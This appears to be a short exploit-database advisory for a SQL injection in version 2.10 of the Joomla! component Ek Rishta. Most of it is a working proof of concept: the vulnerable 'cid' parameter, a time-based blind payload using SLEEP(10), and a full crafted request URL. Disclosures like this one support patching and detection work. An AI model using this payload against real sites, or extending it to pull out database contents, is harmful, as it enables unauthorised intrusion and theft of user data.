# # # # # Exploit Title: Joomla! Component Ek Rishta 2.10 - SQL Injection # Dork: N/A # Date: 08.06.2018 # Vendor Homepage: https://www.joomlaextensions.co.in/ # Software Link: https://extensions.joomla.org/extension/ek-rishta/ # Version: 2.10 # Tested on: WiN7_x64/ # video : https://youtu.be/UWGFVUU9AU0 # # # # # Exploit Author: 41!kh4224rDz # # # # # ------------------------------SQL Injection---------------------------------------- # POC: # Parameter : user_detail&cid # Payload : 1%' AND SLEEP(10)%23 # # 1) # http://localhost/[PATH]/index.php?option=com_ekrishta&view=user_detail&cid=941%%27%20AND%20SLEEP(10)%23 # # # # # #